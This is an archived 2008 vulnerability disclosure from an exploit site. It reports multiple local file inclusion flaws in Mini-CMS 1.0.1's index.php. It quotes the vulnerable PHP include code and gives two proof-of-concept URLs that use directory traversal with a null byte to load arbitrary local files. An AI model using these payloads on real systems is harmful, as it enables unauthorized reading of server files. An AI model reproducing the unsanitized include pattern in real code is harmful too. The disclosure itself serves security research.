Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities

2008-12-07T00:00:00
ID 1337DAY-ID-4380
Type zdt
Reporter cOndemned
Modified 2008-12-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
========================================================================


/*

	$Id: minicms-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_cms.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	9.	$page = !empty($_GET['page']) ? $_GET['page'] : "home";
	10.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	80.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	81.		require("page/" . $page . ".php");
	82.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	83.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_cms_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_cms_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	

It's the same shit as in Mini-Blog 1.0.1... I don't even know how to call it... 
Maybe double fail ? x]
	
	
EoF



#  0day.today [2018-03-20]  #